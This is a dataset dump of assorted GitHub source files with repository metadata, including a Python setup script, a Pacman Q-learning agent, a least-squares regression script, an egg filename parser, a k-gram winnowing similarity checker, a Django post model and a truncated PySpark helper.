blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8a6cccdccaf0f2d9f455ac73ecd2822d428383a1 | b722490e4c269f4b53e085df566ec1f1d3d5393e | /setup.py | 0b06a0def03447c8fb2cc14f4b7c5a53cc893196 | [
"MIT"
] | permissive | wwilla7/mars | 5287e87cd91d20aa2595481d22532dcc40700e34 | 8df7c7f9c96a45330b3348b9dab9117e3ede4d80 | refs/heads/master | 2022-04-30T20:08:20.167031 | 2020-04-22T17:46:27 | 2020-04-22T17:46:27 | 257,968,793 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,147 | py | """
mars
A project for practicing cookiecutter
"""
import sys
from setuptools import setup, find_packages
import versioneer

# Split the module docstring into lines; it supplies the short description
# and the fallback long description below.
# NOTE(review): the docstring starts with a newline, so short_description[0]
# is the empty string -- the intended one-liner is probably index 1. Confirm
# before changing, since it alters published package metadata.
short_description = __doc__.split("\n")

# from https://github.com/pytest-dev/pytest-runner#conditional-requirement
# Only require pytest-runner when a test-related command is actually invoked.
needs_pytest = {'pytest', 'test', 'ptr'}.intersection(sys.argv)
pytest_runner = ['pytest-runner'] if needs_pytest else []

try:
    with open("README.md", "r") as handle:
        long_description = handle.read()
except (IOError, OSError):
    # README.md may be missing (e.g. in a stripped sdist); fall back to the
    # docstring body.  A bare `except:` here would also hide real errors
    # such as KeyboardInterrupt, so only file-access failures are caught.
    long_description = "\n".join(short_description[2:])

setup(
    # Self-descriptive entries which should always be present
    name='mars',
    author='wwilla',
    author_email='liangyuewilla@gmail.com',
    description=short_description[0],
    long_description=long_description,
    long_description_content_type="text/markdown",
    version=versioneer.get_version(),
    cmdclass=versioneer.get_cmdclass(),
    license='MIT',
    # Which Python importable modules should be included when your package is installed
    # Handled automatically by setuptools. Use 'exclude' to prevent some specific
    # subpackage(s) from being added, if needed
    packages=find_packages(),
    # Optional include package data to ship with your package
    # Customize MANIFEST.in if the general case does not suit your needs
    # Comment out this line to prevent the files from being packaged with your software
    include_package_data=True,
    # Allows `setup.py test` to work correctly with pytest
    setup_requires=[] + pytest_runner,
    # Additional entries you may want simply uncomment the lines you want and fill in the data
    # url='http://www.my_package.com', # Website
    # install_requires=[], # Required packages, pulls from pip if needed; do not use for Conda deployment
    # platforms=['Linux',
    # 'Mac OS-X',
    # 'Unix',
    # 'Windows'], # Valid platforms your code works on, adjust to your flavor
    # python_requires=">=3.5", # Python version restrictions
    # Manual control if final package is compressible or not, set False to prevent the .egg from being made
    # zip_safe=False,
)
| [
"liangyuewilla@gmail.com"
] | liangyuewilla@gmail.com |
629a1317427e9589d52846098d097024ce170513 | 49a3f9edcb5197afcceba623a551ec38d85ac496 | /HW3/qlearningAgents.py | dcd24edc4235c5832753e89eb9346acfe9cea085 | [] | no_license | guancongyi/Pacman | 0ceb0a743e5db8e6dc316d0ae5e6adb6308990ce | f51b27bdf727e2225ffa2ec39e333dffecc9c681 | refs/heads/master | 2022-04-16T18:28:18.792698 | 2020-03-14T20:47:48 | 2020-03-14T20:47:48 | 164,015,684 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,247 | py | # qlearningAgents.py
# ------------------
# Licensing Information: You are free to use or extend these projects for
# educational purposes provided that (1) you do not distribute or publish
# solutions, (2) you retain this notice, and (3) you provide clear
# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.
#
# Attribution Information: The Pacman AI projects were developed at UC Berkeley.
# The core projects and autograders were primarily created by John DeNero
# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).
# Student side autograding was added by Brad Miller, Nick Hay, and
# Pieter Abbeel (pabbeel@cs.berkeley.edu).
from game import *
from learningAgents import ReinforcementAgent
from featureExtractors import *
import random,util,math
class QLearningAgent(ReinforcementAgent):
    """
    Tabular Q-learning agent.

    Learns Q(state, action) values from observed transitions via the
    standard temporal-difference update and acts epsilon-greedily.

    Instance variables available:
      - self.epsilon  (exploration probability)
      - self.alpha    (learning rate)
      - self.discount (discount rate)

    Use self.getLegalActions(state) to obtain the legal actions of a state.
    """

    def __init__(self, **args):
        "You can initialize Q-values here..."
        ReinforcementAgent.__init__(self, **args)
        "*** YOUR CODE HERE ***"
        # Counter defaults unseen (state, action) pairs to 0.0.
        self.qValues = util.Counter()

    def getQValue(self, state, action):
        """
        Return Q(state, action), or 0.0 if the pair has never been seen.
        """
        "*** YOUR CODE HERE ***"
        return self.qValues[(state, action)]

    def computeValueFromQValues(self, state):
        """
        Return max_a Q(state, a) over the legal actions, or 0.0 at a
        terminal state (no legal actions).
        """
        "*** YOUR CODE HERE ***"
        legal = self.getLegalActions(state)
        if not legal:
            return 0.0
        return max(self.getQValue(state, a) for a in legal)

    def computeActionFromQValues(self, state):
        """
        Return the greedy action for `state`, or None at a terminal state.
        Ties are broken in favour of the first maximal action.
        """
        "*** YOUR CODE HERE ***"
        legal = self.getLegalActions(state)
        if not legal:
            return None
        bestAction = None
        bestQ = None
        for candidate in legal:
            q = self.getQValue(state, candidate)
            if bestQ is None or q > bestQ:
                bestQ = q
                bestAction = candidate
        return bestAction

    def getAction(self, state):
        """
        Epsilon-greedy action selection: with probability self.epsilon pick
        a uniformly random legal action, otherwise the greedy one.  Returns
        None at a terminal state.
        """
        "*** YOUR CODE HERE ***"
        legalActions = self.getLegalActions(state)
        if not legalActions:
            return None
        if util.flipCoin(self.epsilon):
            return random.choice(legalActions)
        return self.computeActionFromQValues(state)

    def update(self, state, action, nextState, reward):
        """
        TD update for the observed transition state --action--> nextState
        with the given reward.  Called by the parent class; never call it
        yourself.
        """
        "*** YOUR CODE HERE ***"
        # Q <- Q + alpha * (TD target - Q)
        sample = reward + self.discount * self.getValue(nextState)
        oldQ = self.qValues[(state, action)]
        self.qValues[(state, action)] = oldQ + self.alpha * (sample - oldQ)

    def getPolicy(self, state):
        return self.computeActionFromQValues(state)

    def getValue(self, state):
        return self.computeValueFromQValues(state)
class PacmanQAgent(QLearningAgent):
    "Exactly the same as QLearningAgent, but with different default parameters"

    def __init__(self, epsilon=0.05, gamma=0.8, alpha=0.2, numTraining=0, **args):
        """
        These default parameters can be changed from the pacman.py command line.
        For example, to change the exploration rate, try:
            python pacman.py -p PacmanQLearningAgent -a epsilon=0.1

        alpha       - learning rate
        epsilon     - exploration rate
        gamma       - discount factor
        numTraining - number of training episodes, i.e. no learning after
                      these many episodes
        """
        # Fold the explicit keyword arguments back into the dict handed to
        # the parent constructor.
        args.update(epsilon=epsilon, gamma=gamma, alpha=alpha,
                    numTraining=numTraining)
        self.index = 0  # This is always Pacman
        QLearningAgent.__init__(self, **args)

    def getAction(self, state):
        """
        Simply calls the getAction method of QLearningAgent and then
        informs parent of action for Pacman.  Do not change or remove this
        method.
        """
        chosen = QLearningAgent.getAction(self, state)
        self.doAction(state, chosen)
        return chosen
class ApproximateQAgent(PacmanQAgent):
    """
    ApproximateQLearningAgent

    Linear function approximation of Q-values:
        Q(s, a) = w . featureVector(s, a)
    Only getQValue and update are overridden; every other QLearningAgent
    method works as-is.
    """

    def __init__(self, extractor='IdentityExtractor', **args):
        # Resolve the extractor class by name and instantiate it.
        self.featExtractor = util.lookup(extractor, globals())()
        PacmanQAgent.__init__(self, **args)
        # Feature weights; Counter defaults missing features to 0.0.
        self.weights = util.Counter()

    def getWeights(self):
        return self.weights

    def getQValue(self, state, action):
        """
        Should return Q(state,action) = w * featureVector
        where * is the dotProduct operator
        """
        "*** YOUR CODE HERE ***"
        featureVector = self.featExtractor.getFeatures(state, action)
        return self.getWeights() * featureVector

    def update(self, state, action, nextState, reward):
        """
        Should update your weights based on transition
        """
        "*** YOUR CODE HERE ***"
        # TD error against the linear approximation, then one gradient step
        # per active feature.
        target = reward + self.discount * self.getValue(nextState)
        diff = target - self.getQValue(state, action)
        featureVector = self.featExtractor.getFeatures(state, action)
        for featureName in featureVector:
            self.weights[featureName] += self.alpha * diff * featureVector[featureName]

    def final(self, state):
        "Called at the end of each game."
        # call the super-class final method
        PacmanQAgent.final(self, state)
        # did we finish training?
        if self.episodesSoFar == self.numTraining:
            # you might want to print your weights here for debugging
            "*** YOUR CODE HERE ***"
            pass
| [
"congyiguan@gmail.com"
] | congyiguan@gmail.com |
d854c8d7c4ff09f13074b1f110077016a3651153 | 695481436ed2ae8a373ed1a9ea9151fff55f305b | /OLS_linear_regression.py | f9fde77d7c8eaba36f9bb9323e144050991222db | [] | no_license | bernardpg/homogeneous | d9c724590599be2a8dd8bd1bb3612911a74027a9 | 6d7318ab5fd5d7f63eabec36b6299cc82779970c | refs/heads/master | 2021-05-13T20:40:41.627582 | 2018-01-12T17:16:59 | 2018-01-12T17:16:59 | 116,917,649 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,320 | py | import numpy as np
from scipy import linalg, optimize
import os as os
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
#####
# Ordinary least squares fit of Label against the two features F1, F2 via the
# pseudo-inverse, followed by a 3-D plot of the fitted plane and computation
# of the plane's unit normal vector.
#data-input
#F1_data
F1 = np.r_[45.9, 41.3, 10.8, 48.9, 32.8, 19.6, 2.1, 2.6, 5.8, 24, 35.1, 7.6, 32.9, 39.6, 20.5, 23.9, 27.7, 5.1, 15.9, 16.9, 12.6, 3.5, 29.3, 16.7, 27.1, 16, 28.3, 17.4, 1.5, 20, 1.4, 4.1, 43.8, 49.4, 26.7, 37.7, 22.3, 33.4, 27.7, 8.4, 25.7, 22.5, 9.9, 41.5, 15.8, 11.7]
#F2_data
F2 = np.r_[69.3, 58.5, 58.4, 75, 23.5, 11.6, 1, 21.2, 24.2, 4, 65.9, 7.2, 46, 55.8, 18.3, 19.1, 53.4, 23.5, 49.6, 26.2, 18.3, 19.5, 12.6, 22.9, 22.9, 40.8, 43.2, 38.6, 30, 0.3, 7.4, 8.5, 5, 45.7, 35.1, 32, 31.6, 38.7, 1.8, 26.4, 43.3, 31.5, 35.7, 18.5, 49.9, 36.8]
#label_data
Label = np.r_[9.3, 18.5, 12.9, 7.2, 11.8, 13.2, 4.8, 10.6, 8.6, 17.4, 9.2, 9.7, 19, 24.4, 11.3, 14.6, 18, 12.5, 5.6, 15.5, 9.7, 12, 15, 15.9, 18.9, 10.5, 21.4, 11.9, 9.6, 17.4, 9.5, 12.8, 25.4, 14.7, 10.1, 21.5, 16.6, 17.1, 20.7, 12.9, 8.5, 14.9, 10.6, 23.2, 14.8, 9.7]
####
#open_3d map
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
#ax = fig.gca(projection='3d')
##
###feature_map
# Stack the two feature columns into the 46x2 design matrix A.
A = np.c_[F1[:, np.newaxis],F2[:, np.newaxis]]
###feature_mean
feature_mean = np.mean(A, 0)
"""C=np.copy(A)
I=A.shape
for i in range(I[0]):
C[i] -= data_mean
"""
#label_mean
label_mean=np.mean(Label,0)
"""
#z_mean=np.mean(ei,0)
#b = np.copy(ei)
b = np.copy(z)
J=z.shape
#J=ei.shape
for i in range(J[0]):
b[i] -= z_mean
"""
####matrix multiply
#OLS-min-least
####
# Least-squares weights: W = pinv(A) . Label (no intercept column in A).
W=(linalg.pinv(A)).dot(Label)
print(W)
#solve-it
##### The OLS algorithm uses the mean point to calculate the constant term.
###feature_map
#constant
# const is chosen so the fitted plane passes through the data centroid:
# W[0]*mean(F1) + W[1]*mean(F2) - const == mean(Label).
const= (W[0]*feature_mean[0]+W[1]*feature_mean[1]-label_mean)
#con=con.repeat(len(F1))
###utilize-the_mean_value to calculate it
####
#plot_3d_map
####
#####
# Plane model z = W[0]*x + W[1]*y - const, evaluated over a 60x60 grid.
LR = lambda x,y : W[0]*x + W[1]*y-const
x2 = y2 = np.arange(0, 60.0)
X, Y = np.meshgrid(x2, y2)
zs = np.array([LR(x2,y2) for x2,y2 in zip(np.ravel(X), np.ravel(Y))])
Z = zs.reshape(X.shape)
# NOTE(review): the next line uses feature_mean[0]/feature_mean[1] as loop
# targets, clobbering the computed means, and `s` is never used afterwards --
# this looks like leftover debug code; confirm before relying on feature_mean.
s=np.array([LR(x2,y2) for feature_mean[0], feature_mean[1] in zip(np.ravel(X), np.ravel(Y))])
ax.plot_surface(X, Y, Z)
ax.scatter(F1,F2,Label)
ax.set_xlabel('X Label')
ax.set_ylabel('Y Label')
ax.set_zlabel('Z Label')
plt.show()
###vector_normal
# Normal vector of the fitted plane, scaled to unit length.
V=np.r_[1,W]
V_normal=V/np.linalg.norm(V)
print(V_normal)
#n = norm(X,option)  (solved)
| [
"scottpiliben@gmail.com"
] | scottpiliben@gmail.com |
2a715ba1c3bd9636d92fbac36798cfaf9786dc35 | 5dd03f9bd8886f02315c254eb2569e4b6d368849 | /src/python/twitter/common/python/eggparser.py | 9b5b6bdc1282fe4543ffc44cae5daacea7063937 | [
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0"
] | permissive | adamsxu/commons | 9e1bff8be131f5b802d3aadc9916d5f3a760166c | 9fd5a4ab142295692994b012a2a2ef3935d35c0b | refs/heads/master | 2021-01-17T23:13:51.478337 | 2012-03-11T17:30:24 | 2012-03-11T17:30:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,547 | py | # ==================================================================================================
# Copyright 2011 Twitter, Inc.
# --------------------------------------------------------------------------------------------------
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this work except in compliance with the License.
# You may obtain a copy of the License in the LICENSE file, or at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==================================================================================================
class EggParserOsModule:
    """
    Abstraction of the os-level functions the egg parser needs, so we can
    break it in tests.
    """
    @staticmethod
    def uname():
        """Return os.uname(); first field is the platform, last the arch."""
        import os
        return os.uname()

    @staticmethod
    def version_info():
        """Return sys.version_info; the first two fields are (major, minor)."""
        import sys
        return sys.version_info


class EggParser(object):
    """
    Parser of .egg filenames, which come in the following format:
      name ["-" version ["-py" pyver ["-" required_platform]]] "." ext
    """
    def __init__(self,
                 uname = EggParserOsModule.uname(),
                 version_info = EggParserOsModule.version_info()):
        # NOTE: the defaults are evaluated once, at class-definition time;
        # pass explicit values (as the tests do) to override them.
        self._uname = uname
        self._version_info = version_info

    @staticmethod
    def _get_egg_name(components):
        """Split off the package name (first '-'-separated component)."""
        return (components[0], components[1:])

    @staticmethod
    def _get_egg_version(components):
        """Consume components up to the first 'py...' tag as the version."""
        for k in range(len(components)):
            if components[k].startswith("py"):
                return ('-'.join(components[0:k]), components[k:])
        if components:
            return ('-'.join(components), [])
        else:
            return (None, [])

    @staticmethod
    def _get_egg_py_version(components):
        """Parse a leading 'pyX.Y' tag into an (X, Y) int tuple, else ()."""
        if components and components[0].startswith("py"):
            try:
                major, minor = components[0][2:].split('.')
                major, minor = int(major), int(minor)
                return ((major, minor), components[1:])
            except ValueError:
                # Malformed tag (wrong number of dots or non-numeric parts):
                # fall through and report "no python version".  The original
                # bare `except:` also swallowed unrelated errors.
                pass
        return ((), components)

    @staticmethod
    def _get_egg_platform(components):
        """Whatever remains after the py-version is the platform tuple."""
        return (tuple(components), [])

    def parse(self, filename):
        """
        Parse an egg filename into (name, version, py_version, platform).
        Returns None for empty names or names not ending in '.egg'.
        """
        if not filename: return None
        if not filename.endswith('.egg'): return None
        components = filename[0:-len('.egg')].split('-')
        package_name, components = EggParser._get_egg_name(components)
        package_version, components = EggParser._get_egg_version(components)
        package_py_version, components = EggParser._get_egg_py_version(components)
        package_platform, components = EggParser._get_egg_platform(components)
        return (package_name, package_version, package_py_version, package_platform)

    def get_architecture(self):
        """Return (platform, arch, (py_major, py_minor)) for this host."""
        py_version = self._version_info[0:2]
        platform = self._uname[0].lower()
        arch = self._uname[-1].lower()
        if platform == 'darwin': platform = 'macosx'
        return (platform, arch, py_version)

    def is_compatible(self, filename):
        """
        True if the egg's python version and platform tags (when present)
        match this host; unparseable filenames are incompatible.
        """
        try:
            _, _, egg_py_version, egg_platform = self.parse(filename)
        except TypeError:
            # parse() returned None (not an egg filename) -> not compatible.
            return False
        my_platform, my_arch, my_py_version = self.get_architecture()
        if egg_py_version and egg_py_version != my_py_version: return False
        if egg_platform and egg_platform[0] != my_platform: return False
        # ignore specific architectures until we ever actually care.
        return True
| [
"jsirois@twitter.com"
] | jsirois@twitter.com |
c42a99064e1ef26fa41a3ef19c58eee52c0517f7 | 73eb6ba35333bc143f42bfd822e725991c594463 | /server/app/wordpredictor/dictionary/dictionary.py | cea8b6fed8402eefd23ce49ba120cf9624da8885 | [] | no_license | LoveFeelings/bogstavere | 790a43d01bcff33185abdea4aa4ca954ef70ffa8 | 47d1de0d901bba6884e2f822f28e6a04b3c956db | refs/heads/master | 2020-12-11T01:51:32.539632 | 2015-07-01T17:57:00 | 2015-07-01T17:57:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,939 | py | from . trie import Trie
from . node import Node
import codecs
class Dictionary(object):
    """Incremental word lookup over a trie, driven one keypress at a time.

    `self.path` is a stack of Node wrappers tracing the trie descent for
    the letters typed so far; popping the stack implements backspace.
    Trie/Node semantics (step/walk/root layout) are defined in the sibling
    trie/node modules -- comments below describe only what is visible here.
    """

    def __init__(self, words ):
        # `words` is handed to Trie.load(); presumably an iterable of
        # dictionary words -- confirm against the Trie implementation.
        self.trie = Trie()
        self.words = words
        self.__load_words()
        self.path = []
        self.reset()
        # True while the most recent key was a digit (see addInt/keypress).
        self.lastWasInteger = False

    def reset(self):
        # Restart the descent at the trie root.
        self.path = []
        self.path.append(Node(self.trie))

    def __load_words(self):
        self.trie.load(self.words)

    def __prefix(self):
        # Rebuild the typed prefix from every path node except the last
        # (the current, not-yet-committed position).  Each node contributes
        # trie.root[nodeIndex][0], which appears to be the edge label.
        prefix = ""
        for pn in self.path[0:-1]:
            node_index = pn.nodeIndex
            prefix += pn.trie.root[node_index][0]
        return prefix

    def addInt(self):
        # Record that the last key was a digit, so the next backspace only
        # clears this flag instead of popping a trie node.
        self.lastWasInteger = True

    def keypress( self, key ) :
        """Dispatch one key ("space", "backspace", or a letter) and return
        the resulting WordList (prefix + candidate suffixes)."""
        if key == "space":
            # Space ends the word: start over from the trie root.
            self.reset()
            return self.wordList()
        if key == "backspace":
            if self.path and not self.lastWasInteger :
                self.path.pop()
            if self.lastWasInteger :
                self.lastWasInteger = False
            if not self.path:
                # Never leave the path empty -- re-seed with the root node.
                self.reset()
            return self.wordList()
        return self.search( key )

    def search(self, letter):
        """Advance the descent by one letter via Trie.step and return the
        updated word list."""
        path_node = self.path[-1]
        trie = path_node.trie
        node_index = path_node.nodeIndex
        word_part_index = path_node.wordPartIndex
        # step() returns (next subtrie or falsy, new node index, new word-part
        # index) -- exact contract lives in the trie module.
        next, node_index, word_part_index = trie.step( letter , node_index , word_part_index )
        print( next , node_index , word_part_index )
        self.path[-1].update(node_index, word_part_index )
        if next :
            self.path.append( Node( next ) )
        return self.wordList()

    def wordList(self):
        """Return WordList(prefix, suffixes): the typed prefix plus the
        completions reachable from the current trie position."""
        import collections
        WordList = collections.namedtuple( "WordList" , [ "prefix" , "suffixes" ] )
        path_node = self.path[-1]
        prefix = self.__prefix()
        suffixes = path_node.trie.walk(0,1)
        return WordList( prefix , suffixes )
| [
"pallebh@gmail.com"
] | pallebh@gmail.com |
873c47468a937c9973ab6950cd7b3b06f9e616ae | 56c68bfa60f8c5c49f33a78a2dee874980de36a7 | /kgram.py | 3091af39f17d6123bccb513df61493702e0be285 | [] | no_license | XunzhaoYu/SimilarityTester | a705c042149264b7b5dda5e19372fe2d2785ede8 | 5644963486a08524c0e5aea41808bfe774db6a0e | refs/heads/master | 2021-08-23T10:53:55.405169 | 2017-12-04T15:54:03 | 2017-12-04T15:54:03 | 112,972,513 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,140 | py | #!/usr/bin/env python
# coding=utf-8
# The steps of calculate hash for similarity check:
# 1. pre-processing
# 2. dividing the files by K-gram. List kGram.
# 3. calculating the hash value of kGram. List hashList.
# 4. shrinking the size of list by winnowing algorithm. Dictionary winHash.
#
# Python 2 script (print statements, xrange).  For every submission file it
# computes a winnowed fingerprint set, then builds a pairwise resemblance
# matrix (Jaccard similarity * 100) and writes result/analysis CSVs.
import os
import time
import datetime
import timeit
import numpy as np

K = 12              # k-gram (shingle) length in characters
data = ""
winHashList = []    # one fingerprint set per processed file
readPath = "/Users/xunzhaoyu/Documents/PhD/Documents of Study/TA/submissions/submissions_pre/"
writePath = "/Users/xunzhaoyu/Documents/PhD/Documents of Study/TA/submissions/submissions_hash/"
fileList = os.listdir(readPath)
fileList = fileList[1:len(fileList)] # remove the hidden file ".DS_Store"
print fileList
count = 0;
for f in fileList:
    print f
    count += 1
    print count
    fileReadPath = os.path.join(readPath, f)
    fileWritePath = os.path.join(writePath, f)
    if os.path.isfile(fileReadPath):
        srcFile = open(fileReadPath)
        objFile = open(fileWritePath, "w")
        data = srcFile.read()
        # Step2: k-gram division -- kGram
        # Every overlapping K-character substring of the file.
        kGram = []
        shingleNum = len(data)-K
        for i in range(0, shingleNum):
            shingle = data[i:i+K]
            kGram.append(shingle)
        print kGram
        print "the number of k-gram:" + str(len(kGram)) + ", " + str(shingleNum)
        # Step3: rolling hash -- hashList
        # Polynomial hash with base 3; each subsequent shingle's hash is
        # derived from the previous one in O(1) (Rabin-Karp style).
        Base = 3
        first_hash = 0
        pre_hash = 0
        hash = 0
        hashList = []
        firstShingle = kGram[0]
        # start = time.time()
        # stTime = datetime.datetime.now()
        for i in range(K):
            hash += ord(firstShingle[i])*(Base**(K-1-i))
        hashList.append(hash)
        for i in range(1, len(kGram)):
            preshingle = kGram[i-1]
            shingle = kGram[i]
            hash = hash * Base - ord(preshingle[0])*Base**K + ord(shingle[K-1])
            hashList.append(hash)
        print hashList
        # end = time.time()
        # endTime = datetime.datetime.now()
        # print "rolling Hash running time :" + str((end-start))
        # Step4: winnowing hash -- winHash
        # Slide a window of WINSIZE hashes; record the minimum of each
        # window (when its position changes) as a fingerprint token.
        WINSIZE = 4
        winCnt= len(kGram)-WINSIZE+1
        minHash = 0
        minPos = 0
        """"
        winHash = {}
        for i in range(winCnt):
        templist = hashList[i:WINSIZE+i]
        minHash= templist[WINSIZE-1]
        minPos = WINSIZE+i-1
        for j in range(WINSIZE):
        if templist[j] < minHash:
        minHash = templist[j]
        minPos = i+j
        if not winHash.has_key(minPos):
        winHash[minPos] = minHash
        print winHash
        """
        element = 0
        # NOTE(review): preMinPos starts at 0, so a first window whose
        # minimum sits at position 0 is never recorded -- confirm intended.
        preMinPos = 0
        winHash = set()
        for i in range(winCnt):
            templist = hashList[i:WINSIZE+i]
            # calculate the minHash in a window
            minHash = templist[WINSIZE-1]
            minPos = WINSIZE+i-1
            for j in range(WINSIZE):
                if templist[j] < minHash:
                    minHash = templist[j]
                    minPos = i+j
            if minPos != preMinPos:
                # calculate the token of a new minHash
                # (hash*100 plus a collision counter keeps tokens unique)
                element = minHash * 100
                # while winHash.count(element) != 0:
                while element in winHash:
                    element = element + 1
                winHash.add(element)
                preMinPos = minPos
        print winHash
        winHashList.append(winHash)
        objFile.write(str(winHash))
        srcFile.close()
        objFile.close()
# get results
# resemblance[i+1, j+1] = 100 * |Fi & Fj| / |Fi | Fj|  (Jaccard percentage);
# row/column 0 hold the 1-based file indices as labels.
resemblance = np.eye(count+1)
for i in xrange(count):
    resemblance[0, i+1] = i+1
    for j in xrange(i + 1, count):
        n = len(set(winHashList[i]).intersection(set(winHashList[j])))
        u = len(set(winHashList[i]).union(set(winHashList[j])))
        resemblance[i+1, j+1] = int( 100 * (float(n)/float(u)) )
# Mirror the upper triangle to make the matrix symmetric (the subtracted
# identity removes the doubled diagonal).
resemblance = resemblance + resemblance.T - 2*np.eye(count+1)
print resemblance
resultPath = "/Users/xunzhaoyu/Documents/PhD/Documents of Study/TA/submissions/result.csv"
resultFile = open(resultPath, "w")
np.savetxt(resultPath, resemblance, delimiter = ',')
resultFile.close()
# analyze the results
# statistic[i] = (mean squared similarity of file i to all files, file index).
statistic = np.zeros((count, 2))
for i in xrange(count):
    temp = resemblance[i+1, :]
    temp = temp[1:(count+1)]
    statistic[i, 0] = sum(temp * temp.T)/count
    statistic[i, 1] = int(i+1)
# Bubble-sort rows in descending order of the similarity score so the most
# suspicious submissions come first.
swap = True
for i in range(1, count):
    if not swap:
        break
    else:
        swap = False
        for j in range(0, count - i):
            if statistic[j, 0] < statistic[j+1, 0]:
                temp = statistic[j, 0]
                temp2 = statistic[j, 1]
                statistic[j, 0] = statistic[j + 1, 0]
                statistic[j, 1] = statistic[j + 1, 1]
                statistic[j + 1, 0] = temp
                statistic[j + 1, 1] = temp2
                swap = True
print statistic
analysisPath = "/Users/xunzhaoyu/Documents/PhD/Documents of Study/TA/submissions/analysis.csv"
analysisFile = open(analysisPath, "w")
analysisFile.close() | [
"yuxunzhao@gmail.com"
] | yuxunzhao@gmail.com |
3a315d7c3d8e26c82ab3344a577f4630bbfac7f1 | 8c29a91548da2f643721af663dd9962d50ca911e | /scripts/kill_script.py | 885459d2494b49ff25f0523714a67cd26c7c78f7 | [] | no_license | ProjetEpfNao/Nao | 6b031243fd6ef02b9b6ca0142afe4f57617b4c22 | f6ed20778afafabcb7c01c47d0a322d28b9fea59 | refs/heads/master | 2020-05-23T06:27:26.520497 | 2016-12-14T12:15:18 | 2016-12-14T12:15:18 | 69,444,582 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 138 | py | from naoqi import ALProxy
if __name__ == "__main__":
    # Connect to the local NAOqi broker (9559 is its default port) and stop
    # any in-progress video recording on the robot.
    proxy = ALProxy("ALVideoRecorder", "localhost", 9559)
    proxy.stopRecording()
| [
"etienne.desticourt@gmail.com"
] | etienne.desticourt@gmail.com |
e639cdea31e0d47779d30f5049feb042c8b3a5eb | 8a67820d95f73c90d4edab5537e22ca1fcaa3aee | /ProyectoPruebaDjango/apps/posts/models.py | 30c4cc5e0c34d106a883d0bbc5c71b14c7bd1467 | [] | no_license | sebamawa/ProyectoPruebaDjango | 3803e9950600fa082fe8ad9d76d1789e11e80fbb | 964a45a1c834670c2abe5273378e12ab24ff060a | refs/heads/master | 2020-03-23T19:15:30.234917 | 2018-08-20T05:21:27 | 2018-08-20T05:21:27 | 141,962,235 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,233 | py | from django.db import models
from django.utils import timezone
from django.contrib.auth.models import User
from django import forms
from django.template.defaultfilters import slugify
# Create your models here.
class Post(models.Model):
    """A blog post with a simple draft/published editorial workflow."""

    # Allowed values for the `status` field; posts start as drafts.
    STATUS_CHOICES = (
        ('draft', 'Draft'),
        ('published', 'Published'),
    )
    title = models.CharField(max_length=250)
    # Slug must be unique per publish date (used for date-based post URLs).
    slug = models.SlugField(max_length=250, unique_for_date='publish')
    #We specify the name of the reverse relationship, from User to Post,
    #with the related_name attribute.This will allow us to access related objects easily.
    author = models.ForeignKey(User, on_delete=models.CASCADE, related_name='blog_posts')
    body = models.TextField()
    # Editorial publication timestamp (settable), vs. the automatic
    # created/updated audit timestamps below.
    publish = models.DateTimeField(default=timezone.now)
    created = models.DateTimeField(auto_now_add=True)
    updated = models.DateTimeField(auto_now=True)
    status = models.CharField(max_length=10, choices=STATUS_CHOICES, default='draft')

    class Meta:
        ordering = ('-publish',) #descending order by default when we query the database

    def __str__(self):
        # Human-readable representation used by the admin and shell.
        return self.title
class PostForm(forms.ModelForm):
    """ModelForm exposing every field of Post for create/edit views."""

    class Meta:
        model = Post
        fields = '__all__'
| [
"sebamawa@hotmail.com"
] | sebamawa@hotmail.com |
c6a37527e2dbf47a3b1c4ec52b718c605ecfc8d0 | 9dc60f33538e00e4b5c04d5180db22dbe252f4ba | /Spark_Session/utileriasCiti.py | 34617215ff662a3bfba8e8b4c3c3ef582ce3af7f | [] | no_license | jorgeecr/pyspark | 285a29f57d6bdfe340a2c3f3e7e42d10a6c0e7ed | c276ea868e0b8856acd8269b5f6d4a50ba00e327 | refs/heads/main | 2023-03-12T17:57:49.538674 | 2021-02-24T01:47:21 | 2021-02-24T01:47:21 | 342,012,522 | 1 | 0 | null | 2021-02-24T19:31:02 | 2021-02-24T19:31:01 | null | UTF-8 | Python | false | false | 664 | py | from pyspark import HiveContext
from pyspark.sql.types import *
from pyspark.sql import Row, functions as F
#from pyspark.sql import col
from pyspark.sql.window import Window
from pyspark.sql import SparkSession
from pyspark import SparkContext
from pyspark import SparkConf
from pyspark.sql.functions import lpad
from pyspark.sql.functions import *
import os
import sys
import datetime
def GuardaMiTabla(df,BD,TABLA):
    """Persist DataFrame `df` as Hive table BD.TABLA, overwriting it and
    tagging every row with a constant Area="PLD" column.

    df     -- Spark DataFrame to save
    BD     -- target database name
    TABLA  -- target table name
    """
